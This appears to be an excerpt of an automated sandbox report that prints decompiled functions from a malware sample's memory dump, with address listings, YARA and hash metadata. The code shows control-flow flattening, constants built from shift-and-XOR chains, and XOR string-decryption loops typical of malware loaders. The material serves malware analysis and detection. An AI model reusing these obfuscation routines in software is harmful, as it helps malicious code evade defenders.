                                                                                                                                                            			E00375361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E003820B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x393e08 = E00377FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E0037924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E00390F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E0037960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E00388519(_v20, _v24,  *0x393e08);
				_t104 = 0x5723dc8;
				goto L13;
			}




















                                                                                                                                                            0x00375368
                                                                                                                                                            0x0037536c
                                                                                                                                                            0x00375370
                                                                                                                                                            0x00375376
                                                                                                                                                            0x0037537b
                                                                                                                                                            0x00375383
                                                                                                                                                            0x00375386
                                                                                                                                                            0x0037538d
                                                                                                                                                            0x00375395
                                                                                                                                                            0x00375397
                                                                                                                                                            0x0037539f
                                                                                                                                                            0x003753a4
                                                                                                                                                            0x003753ae
                                                                                                                                                            0x003753bb
                                                                                                                                                            0x003753c3
                                                                                                                                                            0x003753cb
                                                                                                                                                            0x003753d3
                                                                                                                                                            0x003753d8
                                                                                                                                                            0x003753e0
                                                                                                                                                            0x003753e8
                                                                                                                                                            0x003753f6
                                                                                                                                                            0x003753fb
                                                                                                                                                            0x00375401
                                                                                                                                                            0x00375406
                                                                                                                                                            0x0037540e
                                                                                                                                                            0x00375416
                                                                                                                                                            0x0037541e
                                                                                                                                                            0x00375426
                                                                                                                                                            0x0037542e
                                                                                                                                                            0x00375436
                                                                                                                                                            0x0037543b
                                                                                                                                                            0x00375443
                                                                                                                                                            0x0037544b
                                                                                                                                                            0x00375454
                                                                                                                                                            0x00375459
                                                                                                                                                            0x00375464
                                                                                                                                                            0x00375465
                                                                                                                                                            0x00375469
                                                                                                                                                            0x00375471
                                                                                                                                                            0x00375479
                                                                                                                                                            0x00375481
                                                                                                                                                            0x00375491
                                                                                                                                                            0x00375495
                                                                                                                                                            0x0037549d
                                                                                                                                                            0x003754a7
                                                                                                                                                            0x00375501
                                                                                                                                                            0x00375502
                                                                                                                                                            0x00375505
                                                                                                                                                            0x0037550d
                                                                                                                                                            0x00375512
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754a9
                                                                                                                                                            0x003754ab
                                                                                                                                                            0x003754ec
                                                                                                                                                            0x003754f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754ad
                                                                                                                                                            0x003754b3
                                                                                                                                                            0x003754e6
                                                                                                                                                            0x003754e8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754e8
                                                                                                                                                            0x003754b5
                                                                                                                                                            0x003754b7
                                                                                                                                                            0x00375532
                                                                                                                                                            0x00375538
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754b9
                                                                                                                                                            0x003754d2
                                                                                                                                                            0x003754d4
                                                                                                                                                            0x003754d9
                                                                                                                                                            0x003754db
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003754db
                                                                                                                                                            0x003754d9
                                                                                                                                                            0x003754b7
                                                                                                                                                            0x003754b3
                                                                                                                                                            0x003754ab
                                                                                                                                                            0x00375547
                                                                                                                                                            0x00375547
                                                                                                                                                            0x00375527
                                                                                                                                                            0x0037552d
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H2
                                                                                                                                                            • API String ID: 0-302591398
                                                                                                                                                            • Opcode ID: 07604ddabf1f926beb7c63d8f3851f573fab259a628f5ac5934b904d58981b32
                                                                                                                                                            • Instruction ID: 33c33e26a7a2a7d085dae28d625f56cf3048c9d1a2b6e0211c374ec3fc3b05d7
                                                                                                                                                            • Opcode Fuzzy Hash: 07604ddabf1f926beb7c63d8f3851f573fab259a628f5ac5934b904d58981b32
                                                                                                                                                            • Instruction Fuzzy Hash: 3241C1726083019FC729DF15E44941FBBE1FBD8718F148A1DF58A56260D7B5CA48CB83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00378B3D Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00378B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E0038D97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E0038D97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E00373DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}





















                                                                                                                                                            0x00378b44
                                                                                                                                                            0x00378b48
                                                                                                                                                            0x00378b4a
                                                                                                                                                            0x00378b4e
                                                                                                                                                            0x00378b52
                                                                                                                                                            0x00378b56
                                                                                                                                                            0x00378b57
                                                                                                                                                            0x00378b58
                                                                                                                                                            0x00378b5d
                                                                                                                                                            0x00378b65
                                                                                                                                                            0x00378b68
                                                                                                                                                            0x00378b6f
                                                                                                                                                            0x00378b77
                                                                                                                                                            0x00378b79
                                                                                                                                                            0x00378b81
                                                                                                                                                            0x00378b86
                                                                                                                                                            0x00378b93
                                                                                                                                                            0x00378b9b
                                                                                                                                                            0x00378ba3
                                                                                                                                                            0x00378bab
                                                                                                                                                            0x00378bb3
                                                                                                                                                            0x00378bbb
                                                                                                                                                            0x00378bc3
                                                                                                                                                            0x00378bc8
                                                                                                                                                            0x00378bd0
                                                                                                                                                            0x00378bd8
                                                                                                                                                            0x00378be0
                                                                                                                                                            0x00378be8
                                                                                                                                                            0x00378bf0
                                                                                                                                                            0x00378bf8
                                                                                                                                                            0x00378bfd
                                                                                                                                                            0x00378c05
                                                                                                                                                            0x00378c0d
                                                                                                                                                            0x00378c15
                                                                                                                                                            0x00378c1d
                                                                                                                                                            0x00378c25
                                                                                                                                                            0x00378c2d
                                                                                                                                                            0x00378c35
                                                                                                                                                            0x00378c3a
                                                                                                                                                            0x00378c42
                                                                                                                                                            0x00378c4a
                                                                                                                                                            0x00378c52
                                                                                                                                                            0x00378c5d
                                                                                                                                                            0x00378c65
                                                                                                                                                            0x00378c69
                                                                                                                                                            0x00378c6e
                                                                                                                                                            0x00378c76
                                                                                                                                                            0x00378c76
                                                                                                                                                            0x00378c80
                                                                                                                                                            0x00378ce0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378c82
                                                                                                                                                            0x00378c88
                                                                                                                                                            0x00378cd0
                                                                                                                                                            0x00378cd5
                                                                                                                                                            0x00378cd8
                                                                                                                                                            0x00378cda
                                                                                                                                                            0x00378cdc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378cdc
                                                                                                                                                            0x00378c8a
                                                                                                                                                            0x00378c8a
                                                                                                                                                            0x00378c8c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378c8e
                                                                                                                                                            0x00378ca2
                                                                                                                                                            0x00378caf
                                                                                                                                                            0x00378caf
                                                                                                                                                            0x00378c8c
                                                                                                                                                            0x00378c88
                                                                                                                                                            0x00378cb3
                                                                                                                                                            0x00378cbb
                                                                                                                                                            0x00378cbb
                                                                                                                                                            0x00378cf8
                                                                                                                                                            0x00378cfd
                                                                                                                                                            0x00378d00
                                                                                                                                                            0x00378d05
                                                                                                                                                            0x00378d05
                                                                                                                                                            0x00378d05
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 7RX
                                                                                                                                                            • API String ID: 0-861457431
                                                                                                                                                            • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                                            • Instruction ID: 3194f5266dbb8c4af1211b0a2e7543d85ad7917d9210b6cd8230722337ef68ad
                                                                                                                                                            • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                                            • Instruction Fuzzy Hash: 884187711093029BC7A68F21848982FBBE1FFC4788F104A2DF59A92120D7758A198F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00387BA6 Relevance: 1.3, Strings: 1, Instructions: 97COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00387BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E00377FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}
























                                                                                                                                                            0x00387bac
                                                                                                                                                            0x00387bb0
                                                                                                                                                            0x00387bb3
                                                                                                                                                            0x00387bb4
                                                                                                                                                            0x00387bb8
                                                                                                                                                            0x00387bb9
                                                                                                                                                            0x00387bba
                                                                                                                                                            0x00387bbf
                                                                                                                                                            0x00387bc7
                                                                                                                                                            0x00387bc9
                                                                                                                                                            0x00387bd3
                                                                                                                                                            0x00387bd7
                                                                                                                                                            0x00387bdf
                                                                                                                                                            0x00387be4
                                                                                                                                                            0x00387bec
                                                                                                                                                            0x00387bf4
                                                                                                                                                            0x00387c03
                                                                                                                                                            0x00387c06
                                                                                                                                                            0x00387c0a
                                                                                                                                                            0x00387c12
                                                                                                                                                            0x00387c1a
                                                                                                                                                            0x00387c22
                                                                                                                                                            0x00387c32
                                                                                                                                                            0x00387c36
                                                                                                                                                            0x00387c3f
                                                                                                                                                            0x00387c42
                                                                                                                                                            0x00387c46
                                                                                                                                                            0x00387c4e
                                                                                                                                                            0x00387c53
                                                                                                                                                            0x00387c56
                                                                                                                                                            0x00387c58
                                                                                                                                                            0x00387c5e
                                                                                                                                                            0x00387c6f
                                                                                                                                                            0x00387c83
                                                                                                                                                            0x00387c88
                                                                                                                                                            0x00387c90
                                                                                                                                                            0x00387ca6
                                                                                                                                                            0x00387cab
                                                                                                                                                            0x00387cad
                                                                                                                                                            0x00387cb3
                                                                                                                                                            0x00387cb5
                                                                                                                                                            0x00387cb9
                                                                                                                                                            0x00387cba
                                                                                                                                                            0x00387cbd
                                                                                                                                                            0x00387cc0
                                                                                                                                                            0x00387cc4
                                                                                                                                                            0x00387cc4
                                                                                                                                                            0x00387cca
                                                                                                                                                            0x00387cd0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00387cd0
                                                                                                                                                            0x00387cca
                                                                                                                                                            0x00387cda

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ]0
                                                                                                                                                            • API String ID: 0-3096761382
                                                                                                                                                            • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                                            • Instruction ID: f44bc11c44f98108b9f5aa77891cd303918b2e1a518e013b503576d070806d34
                                                                                                                                                            • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                                                            • Instruction Fuzzy Hash: 453177716093008FD318DF29C88594BFBE6EBC9708F108A2EF58997251DBB5E9058B56
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00373C3C Relevance: 1.3, Strings: 1, Instructions: 94COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00373C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E0037A918(_a4, _v40, _v36, _v8, E0038DCF7(_v32, 0x3717c0, _v40), _v12,  &_v564);
				E0037A8B0(_v24, _t107, _v16);
				return E00381F8A(_v20, _v40,  &_v564);
			}


















                                                                                                                                                            0x00373c46
                                                                                                                                                            0x00373c49
                                                                                                                                                            0x00373c4c
                                                                                                                                                            0x00373c4f
                                                                                                                                                            0x00373c50
                                                                                                                                                            0x00373c51
                                                                                                                                                            0x00373c56
                                                                                                                                                            0x00373c5f
                                                                                                                                                            0x00373c66
                                                                                                                                                            0x00373c6d
                                                                                                                                                            0x00373c79
                                                                                                                                                            0x00373c7e
                                                                                                                                                            0x00373c87
                                                                                                                                                            0x00373c8a
                                                                                                                                                            0x00373c8d
                                                                                                                                                            0x00373c94
                                                                                                                                                            0x00373c9b
                                                                                                                                                            0x00373ca2
                                                                                                                                                            0x00373ca9
                                                                                                                                                            0x00373cb5
                                                                                                                                                            0x00373cb6
                                                                                                                                                            0x00373cbb
                                                                                                                                                            0x00373cc2
                                                                                                                                                            0x00373cc9
                                                                                                                                                            0x00373ccd
                                                                                                                                                            0x00373cd8
                                                                                                                                                            0x00373cdb
                                                                                                                                                            0x00373ce2
                                                                                                                                                            0x00373ce9
                                                                                                                                                            0x00373ced
                                                                                                                                                            0x00373cf4
                                                                                                                                                            0x00373cf8
                                                                                                                                                            0x00373cff
                                                                                                                                                            0x00373d06
                                                                                                                                                            0x00373d0d
                                                                                                                                                            0x00373d14
                                                                                                                                                            0x00373d1b
                                                                                                                                                            0x00373d2c
                                                                                                                                                            0x00373d2f
                                                                                                                                                            0x00373d33
                                                                                                                                                            0x00373d37
                                                                                                                                                            0x00373d3e
                                                                                                                                                            0x00373d45
                                                                                                                                                            0x00373d4c
                                                                                                                                                            0x00373d53
                                                                                                                                                            0x00373d5a
                                                                                                                                                            0x00373d61
                                                                                                                                                            0x00373d65
                                                                                                                                                            0x00373d6c
                                                                                                                                                            0x00373d6f
                                                                                                                                                            0x00373d90
                                                                                                                                                            0x00373d9d
                                                                                                                                                            0x00373dbb

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: a3}
                                                                                                                                                            • API String ID: 0-1821053108
                                                                                                                                                            • Opcode ID: 49153f6bc62b15b6440a583e104a878da418189976c06309ca3dbe04ee51d1f0
                                                                                                                                                            • Instruction ID: 7b3c5f7f70f10b136ed5719ec76bdfd572bc72c32cd260e817285ef4eeb7abd2
                                                                                                                                                            • Opcode Fuzzy Hash: 49153f6bc62b15b6440a583e104a878da418189976c06309ca3dbe04ee51d1f0
                                                                                                                                                            • Instruction Fuzzy Hash: CF41F371D00209EBCF19DFE0D94A4EEBBB2FB44314F208199E510BA260D7B95B55DF91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00388606 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00388606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E003820B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E00377FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}



















                                                                                                                                                            0x0038860c
                                                                                                                                                            0x00388610
                                                                                                                                                            0x00388614
                                                                                                                                                            0x00388618
                                                                                                                                                            0x0038861a
                                                                                                                                                            0x0038861f
                                                                                                                                                            0x00388627
                                                                                                                                                            0x0038862a
                                                                                                                                                            0x00388632
                                                                                                                                                            0x00388637
                                                                                                                                                            0x0038863f
                                                                                                                                                            0x00388647
                                                                                                                                                            0x0038864f
                                                                                                                                                            0x00388659
                                                                                                                                                            0x0038865d
                                                                                                                                                            0x00388665
                                                                                                                                                            0x0038866d
                                                                                                                                                            0x00388675
                                                                                                                                                            0x0038867a
                                                                                                                                                            0x00388682
                                                                                                                                                            0x00388686
                                                                                                                                                            0x00388689
                                                                                                                                                            0x0038868b
                                                                                                                                                            0x0038868f
                                                                                                                                                            0x00388693
                                                                                                                                                            0x003886a3
                                                                                                                                                            0x003886ae
                                                                                                                                                            0x003886bc
                                                                                                                                                            0x003886be
                                                                                                                                                            0x003886c6
                                                                                                                                                            0x003886ce
                                                                                                                                                            0x003886d0
                                                                                                                                                            0x003886e1
                                                                                                                                                            0x003886e6
                                                                                                                                                            0x003886e8
                                                                                                                                                            0x003886ec
                                                                                                                                                            0x003886ec
                                                                                                                                                            0x003886ee
                                                                                                                                                            0x003886f1
                                                                                                                                                            0x003886f3
                                                                                                                                                            0x003886fa
                                                                                                                                                            0x003886fd
                                                                                                                                                            0x00388700
                                                                                                                                                            0x00388703
                                                                                                                                                            0x00388709
                                                                                                                                                            0x0038870a
                                                                                                                                                            0x0038870d
                                                                                                                                                            0x00388711
                                                                                                                                                            0x00388711
                                                                                                                                                            0x0038871a
                                                                                                                                                            0x0038871a
                                                                                                                                                            0x00388726

                                                                                                                                                            Strings
